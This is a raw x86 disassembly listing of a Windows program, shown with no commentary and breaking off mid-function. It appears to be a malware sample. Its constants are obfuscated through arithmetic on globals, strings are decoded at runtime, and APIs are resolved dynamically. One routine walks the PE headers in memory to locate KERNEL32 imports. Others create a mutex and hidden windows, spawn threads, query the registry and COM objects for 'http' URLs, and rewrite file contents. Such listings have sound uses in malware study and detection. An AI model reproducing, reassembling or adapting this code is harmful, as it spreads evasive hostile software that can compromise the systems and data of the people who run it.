var_10014 = dword ptr -10014h
var_10003 = byte ptr -10003h
var_FFFF = byte ptr -0FFFFh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10004h
call sub_444C70
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
lea edi, dword_448260
cmp [ebp+arg_4], 43h
jnz short loc_43F267
lea edi, dword_4470F0
loc_43F267: ; CODE XREF: sub_43F242+1D�j
push 0
push 80h
push 3
push 0
push 3
push 0C0000000h
push edi
call ds:dword_44A788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_43F323
push 0
push 0
push esi
push edi
call ds:dword_44AB9C ; SetFilePointer
push 0
lea eax, [ebp+var_4]
push eax
push 0FFFFh
lea eax, [ebp+var_10003]
push eax
push edi
call ds:dword_445028 ; ReadFile
lea ecx, [ebp+var_FFFF]
or eax, 0FFFFFFFFh
loc_43F2B9: ; CODE XREF: sub_43F242+7C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F2B9
mov edx, dword_44B0D0
add edx, 2
add edx, dword_44B0C0
mov ebx, eax
add ebx, edx
mov [ebp+var_4], ebx
mov ebx, dword_44B124
mov edx, ebx
add edx, ebx
mov ebx, [ebp+var_4]
mov [ebp+edx*4+var_10014+1], ebx
push 0
push 0
push esi
push edi
call ds:dword_44AB9C ; SetFilePointer
push 0
lea eax, [ebp+var_4]
push eax
mov eax, dword_44B104
movsx edx, word_44B108
add eax, edx
sub eax, 3
push eax
lea eax, [ebp+var_10003]
push eax
push edi
call ds:dword_44AB8C ; WriteFile
push edi
call ds:dword_449650 ; CloseHandle
loc_43F323: ; CODE XREF: sub_43F242+43�j
pop edi
pop esi
pop ebx
leave
retn
sub_43F242 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F328 proc near ; DATA XREF: sub_43FC77+C�o
; sub_43FC77+2A8�o
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = byte ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = byte ptr -144h
var_45 = byte ptr -45h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 158h
push ebx
push esi
push edi
call sub_4418ED
call sub_440281
call sub_4408F1
call sub_441C26
call sub_4400F6
call sub_43C8E3
call sub_43FF3C
call sub_441D52
loc_43F35C: ; CODE XREF: sub_43F328+94�j
call sub_44017A
mov ebx, eax
mov [ebp+var_45], bl
movzx eax, [ebp+var_45]
movsx edx, word_44B0B8
movsx ecx, word_44B090
add edx, ecx
sub edx, 2
cmp eax, edx
jnz short loc_43F391
mov eax, dword_44B0EC
lea eax, [eax+eax+1]
push eax
call ds:dword_44A660 ; ExitThread
loc_43F391: ; CODE XREF: sub_43F328+57�j
movzx eax, [ebp+var_45]
movsx edx, word_44B0E0
sub edx, 7
cmp eax, edx
jnz short loc_43F3BE
mov eax, dword_44B0D4
add eax, 60h
movsx edx, word_44B14C
add eax, edx
push eax
call ds:dword_44A630
pop ecx
jmp short loc_43F35C
; ---------------------------------------------------------------------------
loc_43F3BE: ; CODE XREF: sub_43F328+79�j
push offset byte_44C46B
call sub_43DF30
mov [ebp+var_154], eax
push offset byte_44C461
call sub_43DF30
mov esi, dword_44B0FC
add esi, dword_44B0D4
sub esi, 2
push esi
push eax
mov esi, [ebp+var_154]
push esi
lea esi, [ebp+var_144]
push esi
call ds:dword_44A634
lea eax, [ebp+var_144]
push eax
push 0
push 0
call ds:dword_44A61C ; CreateMutexA
push 0
call ds:dword_4475E8 ; GetModuleHandleA
mov edi, eax
push offset byte_44C457
call sub_43DF30
mov [ebp+var_20], eax
mov [ebp+var_34], edi
lea eax, sub_44184C
mov [ebp+var_40], eax
push 7F00h
push 0
call ds:dword_448220 ; LoadCursorA
mov [ebp+var_2C], eax
push 7F03h
push 0
call ds:dword_44A620 ; LoadIconA
mov [ebp+var_30], eax
and [ebp+var_24], 0
push 0
call ds:dword_446120 ; GetStockObject
mov [ebp+var_28], eax
mov [ebp+var_44], 3
mov eax, dword_44B138
movsx edx, word_44B13C
add eax, edx
sub eax, 9
mov [ebp+var_3C], eax
mov eax, dword_44B0B0
movsx edx, word_44B108
add eax, edx
sub eax, 0Ah
mov [ebp+var_38], eax
lea eax, [ebp+var_44]
push eax
call ds:dword_4470DC ; RegisterClassA
push offset byte_44C44D
call sub_43DF30
mov [ebp+var_158], eax
push offset byte_44C443
call sub_43DF30
push 0
push edi
push 0
push 0
movsx esi, word_44B0B8
mov ebx, esi
add ebx, dword_44B0C8
sub ebx, 6
push ebx
sub esi, 2
push esi
movsx esi, word_44B13C
sub esi, 7
push esi
mov esi, dword_44B0C4
sub esi, 4
push esi
push 0CA0000h
push eax
mov esi, [ebp+var_158]
push esi
mov esi, dword_44B0AC
add esi, dword_44B134
sub esi, 6
push esi
call ds:dword_449648 ; CreateWindowExA
mov ds:dword_44760C, eax
lea eax, [ebp+var_148]
push eax
push edi
call sub_43D28C
add esp, 2Ch
mov [ebp+var_14C], eax
mov ds:off_44A610, eax
mov eax, [ebp+var_148]
mov ds:dword_447610, eax
call sub_43A4DA
lea eax, [ebp+var_150]
push eax
mov eax, dword_44B0B0
sub eax, 5
push eax
push 0
push offset sub_43A324
mov eax, dword_44B09C
add eax, dword_44B124
sub eax, 5
push eax
push 0
call ds:dword_44AB90 ; CreateThread
push eax
call ds:dword_449650 ; CloseHandle
call sub_43D966
call sub_43C6BA
jmp short loc_43F58E
; ---------------------------------------------------------------------------
loc_43F57A: ; CODE XREF: sub_43F328+288�j
lea eax, [ebp+var_1C]
push eax
call ds:dword_44A77C ; TranslateMessage
lea eax, [ebp+var_1C]
push eax
call ds:dword_445050 ; DispatchMessageA
loc_43F58E: ; CODE XREF: sub_43F328+250�j
movsx eax, word_44B0A0
sub eax, 5
push eax
mov eax, dword_44B0C8
sub eax, 4
push eax
push 0
lea eax, [ebp+var_1C]
push eax
call ds:dword_448368 ; GetMessageA
or eax, eax
jnz short loc_43F57A
pop edi
pop esi
pop ebx
leave
retn 4
sub_43F328 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F5B9 proc near ; CODE XREF: sub_440A86+193�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
mov eax, dword_44B100
sub eax, 3
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4475EC ; RegOpenKeyExA
mov edi, eax
or edi, edi
jz short loc_43F5E6
xor eax, eax
jmp short loc_43F613
; ---------------------------------------------------------------------------
loc_43F5E6: ; CODE XREF: sub_43F5B9+27�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call ds:dword_44503C ; RegQueryValueExA
mov edi, eax
push [ebp+var_4]
call ds:dword_44A618 ; RegCloseKey
or edi, edi
jz short loc_43F610
xor eax, eax
jmp short loc_43F613
; ---------------------------------------------------------------------------
loc_43F610: ; CODE XREF: sub_43F5B9+51�j
xor eax, eax
inc eax
loc_43F613: ; CODE XREF: sub_43F5B9+2B�j
; sub_43F5B9+55�j
pop edi
leave
retn
sub_43F5B9 endp
; =============== S U B R O U T I N E =======================================
sub_43F616 proc near ; CODE XREF: sub_43FC77+279�p
push edi
push offset byte_44C435
call sub_43DF30
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B158, eax
test eax, eax
jnz short loc_43F649
push offset byte_44C427
call sub_43DF30
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B158, eax
loc_43F649: ; CODE XREF: sub_43F616+1A�j
push offset byte_44C41D
call sub_43DF30
push eax
push dword_44B158
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A630, eax
push offset word_44C412
call sub_43DF30
push eax
push dword_44B158
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445030, eax
push offset word_44C40A
call sub_43DF30
push eax
push dword_44B158
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445054, eax
push offset word_44C402
call sub_43DF30
push eax
push dword_44B158
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447A38, eax
push offset dword_44C3F8
call sub_43DF30
push eax
push dword_44B158
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447A2C, eax
push offset word_44C3EE
call sub_43DF30
push eax
push dword_44B158
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A648, eax
push offset dword_44C3E4
call sub_43DF30
push eax
push dword_44B158
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_449634, eax
push offset word_44C3DA
call sub_43DF30
push eax
push dword_44B158
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_449640, eax
push offset word_44C3D2
call sub_43DF30
push eax
push dword_44B158
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44ABAC, eax
push offset byte_44C3C9
call sub_43DF30
push eax
push dword_44B158
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A600, eax
push offset byte_44C3BF
call sub_43DF30
push eax
push dword_44B158
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445020, eax
push offset dword_44C3B4
call sub_43DF30
push eax
push dword_44B158
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A634, eax
push offset dword_44C3A8
call sub_43DF30
push eax
push dword_44B158
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44824C, eax
push offset word_44C39E
call sub_43DF30
add esp, 38h
push eax
push dword_44B158
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4471F4, eax
pop edi
retn
sub_43F616 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F7D6 proc near ; CODE XREF: sub_443EA2+14C�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_444C70
push ebx
push esi
push edi
mov eax, dword_44B0DC
add eax, dword_44B0EC
sub eax, 8
push eax
lea eax, [ebp+var_FFF]
push eax
call sub_441E11
add esp, 8
movsx edi, word_44B090
sub edi, 2
jmp short loc_43F82A
; ---------------------------------------------------------------------------
loc_43F810: ; CODE XREF: sub_43F7D6+5A�j
cmp [ebp+edi+var_FFF], 23h
jnz short loc_43F829
mov eax, dword_44B0B0
sub eax, 5
mov [ebp+edi+var_FFF], al
loc_43F829: ; CODE XREF: sub_43F7D6+42�j
inc edi
loc_43F82A: ; CODE XREF: sub_43F7D6+38�j
cmp edi, 0FFFh
jb short loc_43F810
lea esi, [ebp+var_FFF]
loc_43F838: ; CODE XREF: sub_43F7D6+F9�j
push offset word_44C39A
call sub_43DF30
push offset dword_446020
mov ebx, dword_44B110
movsx edx, word_44B0F4
add edx, ebx
sub edx, 8
push edx
add ebx, dword_44B0D8
sub ebx, 0Bh
push ebx
push eax
movsx ebx, word_44B130
mov edx, ebx
sub edx, 4
push edx
push 0
push esi
push [ebp+arg_0]
mov edx, dword_44B134
add edx, ebx
mov ebx, edx
sub ebx, 6
and ebx, 0FFh
push ebx
call sub_4402F1
add esp, 28h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43F899: ; CODE XREF: sub_43F7D6+C8�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F899
movsx edx, word_44B0E4
add edx, dword_44B100
sub edx, 8
mov ebx, eax
add ebx, esi
mov esi, edx
add esi, ebx
movsx eax, byte ptr [esi]
mov edx, dword_44B148
movsx ecx, word_44B0F0
add edx, ecx
sub edx, 7
cmp eax, edx
jnz loc_43F838
pop edi
pop esi
pop ebx
leave
retn
sub_43F7D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F8DA proc near ; CODE XREF: sub_43A503+6B2�p
; sub_43B8FD+149�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_43F8EF: ; CODE XREF: sub_43F8DA+1A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F8EF
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
lea ecx, [eax]
or eax, 0FFFFFFFFh
loc_43F901: ; CODE XREF: sub_43F8DA+2C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F901
mov esi, eax
movsx eax, word_44B0F4
movsx edx, word_44B118
add eax, edx
sub eax, 9
mov [ebp+var_4], eax
jmp short loc_43F972
; ---------------------------------------------------------------------------
loc_43F922: ; CODE XREF: sub_43F8DA+9E�j
movsx ebx, word_44B118
sub ebx, 9
mov eax, dword_44B0F8
mov edi, eax
add edi, dword_44B0BC
sub edi, 8
jmp short loc_43F96B
; ---------------------------------------------------------------------------
loc_43F93E: ; CODE XREF: sub_43F8DA+93�j
mov eax, [ebp+var_4]
add eax, edi
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
mov edx, [ebp+arg_4]
movsx edx, byte ptr [edx+edi]
cmp eax, edx
jnz short loc_43F96F
inc ebx
cmp ebx, esi
jnz short loc_43F96A
inc [ebp+var_8]
mov eax, [ebp+arg_8]
cmp [ebp+var_8], eax
jnz short loc_43F96A
mov eax, [ebp+var_4]
jmp short loc_43F97F
; ---------------------------------------------------------------------------
loc_43F96A: ; CODE XREF: sub_43F8DA+7E�j
; sub_43F8DA+89�j
inc edi
loc_43F96B: ; CODE XREF: sub_43F8DA+62�j
cmp edi, esi
jb short loc_43F93E
loc_43F96F: ; CODE XREF: sub_43F8DA+79�j
inc [ebp+var_4]
loc_43F972: ; CODE XREF: sub_43F8DA+46�j
mov eax, [ebp+var_C]
cmp [ebp+var_4], eax
jb short loc_43F922
mov eax, 0FFFFh
loc_43F97F: ; CODE XREF: sub_43F8DA+8E�j
pop edi
pop esi
pop ebx
leave
retn
sub_43F8DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F984 proc near ; CODE XREF: sub_43E2B0+491�p
; sub_43E2B0+4A2�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_444C70
push ebx
push esi
push edi
push 5
push [ebp+arg_0]
call ds:dword_445004 ; GetWindow
mov edi, eax
loc_43F9A1: ; CODE XREF: sub_43F984+7C�j
or edi, edi
jnz short loc_43F9A9
xor eax, eax
jmp short loc_43FA02
; ---------------------------------------------------------------------------
loc_43F9A9: ; CODE XREF: sub_43F984+1F�j
push 0FFFh
lea eax, [ebp+var_FFF]
push eax
push edi
call ds:dword_446010 ; GetClassNameA
mov eax, dword_44B128
lea eax, [eax+eax+1]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_FFF]
push eax
call sub_43F8DA
add esp, 0Ch
mov esi, dword_44B0A8
add esi, 0FFF6h
movsx ebx, word_44B108
add esi, ebx
cmp eax, esi
jz short loc_43F9F5
mov eax, edi
jmp short loc_43FA02
; ---------------------------------------------------------------------------
loc_43F9F5: ; CODE XREF: sub_43F984+6B�j
push 2
push edi
call ds:dword_445004 ; GetWindow
mov edi, eax
jmp short loc_43F9A1
; ---------------------------------------------------------------------------
loc_43FA02: ; CODE XREF: sub_43F984+23�j
; sub_43F984+6F�j
pop edi
pop esi
pop ebx
leave
retn
sub_43F984 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43FA07 proc near ; CODE XREF: sub_43CBA8+3C�p
var_10034 = dword ptr -10034h
var_10030 = byte ptr -10030h
var_1002C = dword ptr -1002Ch
var_10028 = dword ptr -10028h
var_10024 = dword ptr -10024h
var_10020 = byte ptr -10020h
var_10018 = dword ptr -10018h
var_10010 = dword ptr -10010h
var_1000C = dword ptr -1000Ch
var_10008 = dword ptr -10008h
var_10003 = byte ptr -10003h
var_10002 = byte ptr -10002h
var_10001 = byte ptr -10001h
var_10000 = byte ptr -10000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10034h
call sub_444C70
push ebx
push esi
push edi
cmp dword_44B230, 0
jnz short loc_43FA36
movsx eax, word_44B0F0
add eax, 5
cmp ds:dword_44761C, eax
jb loc_43FC72
loc_43FA36: ; CODE XREF: sub_43FA07+17�j
lea eax, [ebp+var_10020]
push eax
call ds:dword_445038
lea eax, [ebp+var_10030]
push eax
lea eax, [ebp+var_10020]
push eax
push 9
movsx eax, word_44B0E4
add eax, dword_44B10C
sub eax, 9
push eax
push [ebp+arg_0]
call ds:dword_448254
mov edi, eax
movsx eax, word_44B120
sub eax, 8
cmp edi, eax
jnz loc_43FC72
mov esi, [ebp+var_10018]
and [ebp+var_1000C], 0
lea eax, [ebp+var_1000C]
push eax
push offset dword_44C900
push esi
mov edx, [esi]
call dword ptr ds:0[edx]
mov edi, eax
movsx eax, word_44B140
add eax, dword_44B0C4
sub eax, 0Bh
cmp edi, eax
jnz loc_43FC72
lea eax, [ebp+var_10024]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+78h]
mov edi, eax
mov eax, dword_44B0BC
dec eax
cmp edi, eax
jnz loc_43FC6C
lea eax, [ebp+var_10003]
push eax
push [ebp+var_10024]
call sub_43C65F
add esp, 8
mov edx, eax
inc edx
mov [ebp+var_10034], edx
push [ebp+var_10024]
call ds:dword_44ABA0
cmp [ebp+var_10003], 68h
jnz short loc_43FB2F
cmp [ebp+var_10002], 74h
jnz short loc_43FB2F
cmp [ebp+var_10001], 74h
jnz short loc_43FB2F
cmp [ebp+var_10000], 70h
jz short loc_43FB34
loc_43FB2F: ; CODE XREF: sub_43FA07+10B�j
; sub_43FA07+114�j ...
jmp loc_43FC6C
; ---------------------------------------------------------------------------
loc_43FB34: ; CODE XREF: sub_43FA07+126�j
lea eax, [ebp+var_10010]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+48h]
mov edi, eax
mov eax, dword_44B104
sub eax, 2
cmp edi, eax
jnz loc_43FC6C
lea eax, [ebp+var_4]
push eax
push offset dword_44C880
mov eax, [ebp+var_10010]
push eax
mov edx, [eax]
call dword ptr ds:0[edx]
mov edi, eax
mov eax, dword_44B0C8
movsx edx, word_44B12C
add eax, edx
sub eax, 8
cmp edi, eax
jnz loc_43FC60
lea eax, [ebp+var_10008]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+1B0h]
mov edi, eax
mov eax, dword_44B104
sub eax, 2
cmp edi, eax
jnz loc_43FC57
lea eax, [ebp+var_10028]
push eax
mov eax, [ebp+var_10008]
push eax
mov edx, [eax]
call dword ptr [edx+70h]
mov edi, eax
movsx eax, word_44B0E0
movsx edx, word_44B120
add eax, edx
sub eax, 10h
cmp edi, eax
jz short loc_43FBEC
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
jmp short loc_43FC57
; ---------------------------------------------------------------------------
loc_43FBEC: ; CODE XREF: sub_43FA07+1D5�j
xor ebx, ebx
mov eax, [ebp+var_10028]
cmp [ebp+var_10008], eax
jz short loc_43FBFF
xor ebx, ebx
inc ebx
loc_43FBFF: ; CODE XREF: sub_43FA07+1F3�j
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
mov eax, [ebp+var_10028]
push eax
mov eax, [eax]
call dword ptr [eax+8]
or ebx, ebx
jnz short loc_43FC57
lea eax, [ebp+var_1002C]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+20h]
mov edi, eax
movsx eax, word_44B0F4
cmp edi, eax
jnz short loc_43FC57
push [ebp+var_1002C]
push [ebp+var_4]
call nullsub_2
push [ebp+var_1002C]
push [ebp+var_4]
call sub_443EA2
add esp, 10h
loc_43FC57: ; CODE XREF: sub_43FA07+1A5�j
; sub_43FA07+1E3�j ...
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_43FC60: ; CODE XREF: sub_43FA07+180�j
mov eax, [ebp+var_10010]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_43FC6C: ; CODE XREF: sub_43FA07+D4�j
; sub_43FA07:loc_43FB2F�j ...
push esi
mov eax, [esi]
call dword ptr [eax+8]
loc_43FC72: ; CODE XREF: sub_43FA07+29�j
; sub_43FA07+74�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43FA07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43FC77 proc near ; CODE XREF: start+1�p
var_138 = dword ptr -138h
var_132 = byte ptr -132h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_127 = byte ptr -127h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
push edi
lea eax, sub_43F328
mov [ebp+var_10], eax
mov edx, eax
mov ecx, dword_44B104
add ecx, 0Ah
movsx eax, word_44B12C
add ecx, eax
mov eax, edx
shr eax, cl
mov edx, dword_44B0C0
add edx, 0Dh
mov ecx, edx
mov ebx, eax
shl ebx, cl
loc_43FCB3: ; CODE XREF: sub_43FC77+5A�j
; sub_43FC77+86�j ...
mov [ebp+var_18], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_43FCD3
mov eax, dword_44B09C
add eax, 0FFFBh
add eax, dword_44B124
sub ebx, eax
jmp short loc_43FCB3
; ---------------------------------------------------------------------------
loc_43FCD3: ; CODE XREF: sub_43FC77+46�j
movsx eax, word_44B0CC
add eax, 35h
mov esi, ebx
add esi, eax
mov eax, ebx
add eax, [esi]
mov [ebp+var_14], eax
mov ecx, [ebp+var_10]
cmp eax, ecx
jbe short loc_43FCFF
movsx eax, word_44B118
add eax, 0FFF7h
sub ebx, eax
jmp short loc_43FCB3
; ---------------------------------------------------------------------------
loc_43FCFF: ; CODE XREF: sub_43FC77+76�j
mov eax, [ebp+var_14]
mov [ebp+var_8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_43FD23
mov eax, dword_44B110
add eax, 0FFF4h
add eax, dword_44B0C4
sub ebx, eax
jmp short loc_43FCB3
; ---------------------------------------------------------------------------
loc_43FD23: ; CODE XREF: sub_43FC77+96�j
mov eax, [ebp+var_8]
mov eax, [eax+80h]
mov [ebp+var_C], eax
movsx eax, word_44B120
add eax, dword_44B0D0
sub eax, 8
mov [ebp+var_4], eax
jmp loc_43FED0
; ---------------------------------------------------------------------------
loc_43FD47: ; CODE XREF: sub_43FC77+265�j
mov eax, ebx
add eax, [ebp+var_C]
add eax, [ebp+var_4]
mov [ebp+var_12C], eax
mov edx, dword_44B100
sub edx, 3
cmp [eax], edx
jz loc_43FEE2
mov eax, [ebp+var_12C]
mov edx, ebx
add edx, [eax+0Ch]
mov [ebp+var_130], edx
push edx
lea eax, [ebp+var_127]
push eax
call sub_444C90
mov eax, dword_44B144
mov [ebp+var_28], eax
jmp short loc_43FDB0
; ---------------------------------------------------------------------------
loc_43FD8E: ; CODE XREF: sub_43FC77+150�j
mov eax, [ebp+var_28]
mov al, [ebp+eax+var_127]
cmp al, 61h
jle short loc_43FDAD
cmp al, 7Ah
jge short loc_43FDAD
mov eax, [ebp+var_28]
lea eax, [ebp+eax+var_127]
sub byte ptr [eax], 20h
loc_43FDAD: ; CODE XREF: sub_43FC77+123�j
; sub_43FC77+127�j
inc [ebp+var_28]
loc_43FDB0: ; CODE XREF: sub_43FC77+115�j
mov eax, [ebp+var_28]
movsx eax, [ebp+eax+var_127]
movsx edx, word_44B13C
sub edx, 7
cmp eax, edx
jnz short loc_43FD8E
movsx eax, word_44B0E4
cmp byte ptr [ebp+eax+var_130+3], 4Bh
jnz loc_43FECC
mov eax, dword_44B134
add eax, dword_44B0BC
cmp byte ptr [ebp+eax+var_12C+1], 45h
jnz loc_43FECC
movsx eax, word_44B120
cmp byte ptr [ebp+eax+var_130+3], 52h
jnz loc_43FECC
movsx eax, word_44B118
movsx edx, word_44B140
add eax, edx
cmp [ebp+eax+var_132], 4Ch
jnz loc_43FECC
movsx eax, word_44B0A0
movsx edx, word_44B0CC
add eax, edx
cmp byte ptr [ebp+eax+var_130+3], 33h
jnz loc_43FECC
mov eax, dword_44B0C8
add eax, dword_44B0C0
cmp [ebp+eax+var_127], 32h
jnz short loc_43FECC
mov eax, [ebp+var_12C]
mov edx, ebx
add edx, [eax+10h]
mov [ebp+var_138], edx
mov eax, dword_44B138
sub eax, 2
mov [ebp-134h], eax
loc_43FE7C: ; CODE XREF: sub_43FC77+251�j
mov eax, [ebp+var_138]
mov esi, eax
add esi, [ebp-134h]
mov edi, [esi]
mov eax, dword_44B0C4
movsx edx, word_44B13C
add eax, edx
sub eax, 0Bh
cmp edi, eax
jz short loc_43FEE2
push edi
call sub_43D5B5
pop ecx
cmp dword_44B154, 0
jnz short loc_43FEE2
mov eax, dword_44B094
add eax, 2
movsx edx, word_44B0B8
add eax, edx
add [ebp-134h], eax
jmp short loc_43FE7C
; ---------------------------------------------------------------------------
jmp short loc_43FEE2
; ---------------------------------------------------------------------------
loc_43FECC: ; CODE XREF: sub_43FC77+161�j
; sub_43FC77+17A�j ...
add [ebp+var_4], 14h
loc_43FED0: ; CODE XREF: sub_43FC77+CB�j
mov eax, [ebp+var_8]
mov eax, [eax+84h]
cmp [ebp+var_4], eax
jb loc_43FD47
loc_43FEE2: ; CODE XREF: sub_43FC77+E9�j
; sub_43FC77+228�j ...
cmp dword_44B154, 0
jz short loc_43FF37
call sub_442373
call sub_43F616
call sub_44017A
mov edx, eax
mov [ebp+var_19], dl
movzx eax, [ebp+var_19]
mov edx, dword_44B0D8
dec edx
cmp eax, edx
jz short loc_43FF37
lea eax, [ebp+var_24]
push eax
mov eax, dword_44B0F8
sub eax, 7
push eax
lea eax, [ebp+var_20]
push eax
push offset sub_43F328
movsx eax, word_44B140
sub eax, 7
push eax
push 0
call ds:dword_44AB90 ; CreateThread
loc_43FF37: ; CODE XREF: sub_43FC77+272�j
; sub_43FC77+295�j
pop edi
pop esi
pop ebx
leave
retn
sub_43FC77 endp
; =============== S U B R O U T I N E =======================================
sub_43FF3C proc near ; CODE XREF: sub_43F328+2A�p
push edi
push offset byte_44C38B
call sub_43DF30
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B174, eax
test eax, eax
jnz short loc_43FF6F
push offset dword_44C37C
call sub_43DF30
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B174, eax
loc_43FF6F: ; CODE XREF: sub_43FF3C+1A�j
push offset unk_44C368
call sub_43DF30
pop ecx
push eax
push dword_44B174
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447A44, eax
pop edi
retn
sub_43FF3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43FF8E proc near ; CODE XREF: sub_4407DD+C4�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 8000h
mov eax, dword_44B110
sub eax, 8
push eax
push [ebp+arg_0]
call ds:dword_449630 ; VirtualFree
pop ebp
retn
sub_43FF8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43FFAA proc near ; DATA XREF: .data:0044B270�o
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov eax, [ebp+arg_10]
mov word ptr [ebp+arg_10], ax
movsx eax, word_44B0B4
add eax, 0C3h
cmp [ebp+arg_4], eax
jnz loc_4400EA
mov [ebp+var_18], 3
lea eax, [ebp+var_10]
push eax
mov eax, dword_44B254
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov [ebp+var_4], eax
mov eax, dword_44B0E8
movsx edx, word_44B0B8
add eax, edx
sub eax, 8
cmp [ebp+var_4], eax
jnz loc_4400E6
dec [ebp+var_10]
lea eax, [ebp+var_1C]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, dword_44B254
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov [ebp+var_4], eax
mov eax, dword_44B128
add eax, dword_44B0D0
cmp [ebp+var_4], eax
jnz loc_4400E6
lea eax, [ebp+var_20]
push eax
push offset dword_44C900
mov eax, [ebp+var_1C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp+var_4], eax
movsx eax, word_44B12C
movsx edx, word_44B118
add eax, edx
sub eax, 0Dh
cmp [ebp+var_4], eax
jnz short loc_4400DD
lea eax, off_44B250
mov [ebp+var_8], eax
push eax
mov ebx, [eax]
